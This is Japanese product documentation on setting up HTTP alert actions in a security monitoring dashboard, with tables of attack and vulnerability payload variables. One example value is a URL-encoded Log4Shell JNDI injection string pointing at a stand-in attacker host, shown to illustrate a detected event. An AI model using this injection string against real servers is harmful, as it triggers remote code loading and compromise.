HTTP アラートの作成

[アラート(Alerts)] タブでは、電子メールおよび HTTP ベースのアラートを設定できます。Secure Application が新しい攻撃、脆弱性、またはビジネスリスクを検出したときにアラートを受け取るようにアクションを設定できます。

注: [編集(Edit)](管理者またはテナントレベル)権限を持つユーザーのみが [アラート(Alerts)] にアクセスできます。管理者またはテナントレベルよりも低い権限を持つ RBAC ユーザーはアラートを作成できません。
  1. Secure Application ダッシュボードから、[Alerts] に移動します。
  2. [HTTP] タブで、[+ アクションの追加(+ Add Action)] をクリックします。
  3. [アクション名(Action Name)] に入力します。
    [アクション名(Action Name)] には特殊文字を使用しないでください。
  4. [イベントタイプ(Event Type)] では、[脆弱性(Vulnerability)]、[ビジネスリスク(Business Risk)]、または [攻撃(Attack)] を選択します。
  5. [次へ(Next)] をクリックします。
  6. [アクションの詳細(Action Details)] に、次を入力します。
    1. [メソッドタイプ(Method Type)]:POST
    2. [エンコーディング(Encoding)]:UTF-8
    3. [(オプション)[アプリケーション(Applications)]:このアクションが適用されるアプリケーションをプルダウンリストから最大 100 個選択。リストに入力することで、リストをフィルタリングできます。デフォルトでは、このアクションはすべてのアプリケーションに適用されます。
    4. [Raw URL]:HTTP リクエストの Raw URL を入力します。
  7. [次へ(Next)] をクリックします。
  8. [認証タイプ(Authentication Type)] で、次のように選択します。
    1. [None]:通信が暗号化されていない場合に選択
    2. [Basic] を選択してユーザー名とパスワードを入力
    3. [Bearer Token] を選択してトークンを入力
  9. [次へ(Next)] をクリックします。
  10. (オプション)リクエストのカスタムヘッダーを指定します。
  11. [次へ(Next)] をクリックします。
  12. [Add Payload] をクリックします。

    ペイロードは有効な JSON である必要があります。[事前定義の変数(Predefined Variables)] の内容をコピーして、[エディタ(Editor)] にその変数を貼り付けます。たとえば、[Event Type] に [Attack] を選択した場合、[Add Payload] をクリックしたときに、攻撃イベントに関連する変数を選択できます。

    攻撃変数:

    フィールド 説明 値の例
    $attack.id 攻撃の一意の識別子 "SQL_INJECTION_001"
    $attack.status 攻撃の現在のステータス "ACTIVE""RESOLVED""INVESTIGATING"
    $attack.source 攻撃の送信元または発生元 "External""Internal""Unknown"
    $attack.outcome 攻撃の結果または成果 "BLOCKED""ALLOWED""PARTIALLY_BLOCKED"
    $attack.types 検出された攻撃のタイプ "SQL Injection""XSS""CSRF"
    $attack.eventTrigger 攻撃の検出をトリガーしたイベント "HTTP Request""Database Query"
    $attack.lastDetected 攻撃が最後に検出された時点を示すタイムスタンプ。 "2023-10-15T14:30:00Z"
    $attack.events 攻撃に関連する詳細なイベント。詳細については、以下の「攻撃イベント」の表を参照してください。 攻撃イベントの JSON 配列

    $attack.events には、次のキーフィールドが含まれています。

    フィールド 説明 値の例
    $attack.events.eventType 攻撃中に検出されたアクティビティのタイプ "SOCKET_RESOLVE"
    $attack.events.attackType 特定の攻撃カテゴリが検出されました "LOG4J"
    $attack.events.timestamp 攻撃イベントが発生した時間 "2025-01-22T23:03:52Z"
    $attack.events.applicationName 攻撃の影響を受けたアプリケーション "ExpoitsTestApp"
    $attack.events.tierName 攻撃の影響を受けた階層 "ExpoitsTestTier"
    $attack.events.blocked 攻撃がブロックされたかどうかを示します "true""false"
    $attack.events.attackOutcome イベントの結果 "EXPLOITED""ATTEMPTED""BLOCKED""OBSERVED""UNKNOWN"
    $attack.events.stackTrace 攻撃の発生源であるスタックトレース "java.lang.SecurityManager.checkConnect(...)"
    $attack.events.clientAddress 要求を開始したクライアントの IP アドレス "127.11.11.1"
    $attack.events.clientPort クライアントで使用されるポート "40758"
    $attack.events.serverAddress 要求を処理するサーバーの IP アドレス "127.12.12.1"
    $attack.events.serverPort サーバーで使用されるポート "8088"
    $attack.events.webTransactionUrl エクスプロイト試行に関与する完全な URL "https://vulnerable.app.com/login?user=%24%7Bjndi%3Aldap%3A%2F%2Fmalicious.attacker.com%2Fa%7D"
    $attack.events.maliciousIpOut イベント中に接続されたアウトバウンド IP アドレス "192.0.2.123"
    $attack.events.maliciousIpSourceOut 悪意のある IP が一致する送信元(存在する場合) "10.1.2.45"
    $attack.events.detailJson 構造化された技術メタデータ(クラス、ソケット、メソッドなど) {"classname": "java.net.SocketPermission", ...}

    攻撃イベントが脆弱性によって引き起こされた場合、$attack.events には次の追加フィールドが含まれる場合があります。

    表 1. 脆弱性に関連した攻撃イベントのフィールド
    フィールド 説明 値の例
    $attack.events.vulnerableMethod 脆弱性がトリガーされたメソッド "org.apache.logging.log4j.core.lookup.JndiLookup.lookup(Thread.java:234)"
    $attack.events.matchedCveName 一致した CVE の名前 "CVE-2021-44228"
    $attack.events.cveId 一致した CVE の内部識別子
    $attack.events.vulnerabilityInfo.cvePublishDate CVE 公開日 "2021-12-10T10:10:01Z"
    $attack.events.vulnerabilityInfo.cvssScore CVSS リスクスコア(0 〜 10) 10
    $attack.events.vulnerabilityInfo.cvssSeverity CVSS に基づくシビラティレベル "CRITICAL"
    $attack.events.vulnerabilityInfo.library 関連する脆弱なライブラリ "org.apache.logging.log4j:log4j-core"
    $attack.events.vulnerabilityInfo.title 人間が判読可能な脆弱性についての説明 "Remote Code Execution (RCE)"
    $attack.events.vulnerabilityInfo.kennaScore Kenna Security のリスクスコア 100
    $attack.events.vulnerabilityInfo.kennaActiveInternetBreach 脆弱性が積極的に不正利用されることが知られているかどうか truefalse
    $attack.events.vulnerabilityInfo.kennaEasilyExploitable 脆弱性のエクスプロイトが容易かどうか truefalse
    $attack.events.vulnerabilityInfo.kennaPredictedExploitable 予測モデルによるエクスプロイト可能性のアセスメント truefalse
    $attack.events.vulnerabilityInfo.kennaPopularTarget 組織全体でよく狙われるターゲットかどうか truefalse
    ヒント:

    事前定義の変数 $attack.events を選択して、攻撃に関連付けられた脆弱性に関する詳細をペイロードに含めます。

    事前定義の変数 $attack.events を選択して、256 行のスタックトレースをペイロードに含めます。

  13. [cURL]、[一般情報(General Information)]、[アクション(Actions)]、[セキュリティ(Security)]、[カスタムヘッダー(Custom Headers)]、および [ペイロード(Payload)] の各情報を確認します。
    ServiceNow のペイロードの例:
  14. [Save] をクリックします。
[保存(Save)] をクリックすると、デフォルトの [ルール(Rules)] が自動的に生成されます。ルールを確認するには、 [ルール(Rule)] タブをクリックします。このアクションの適用先アプリケーションを指定した場合、これらのアプリケーションが [ルール(Rules)] タブの [アプリケーション(Application)]列に表示されます。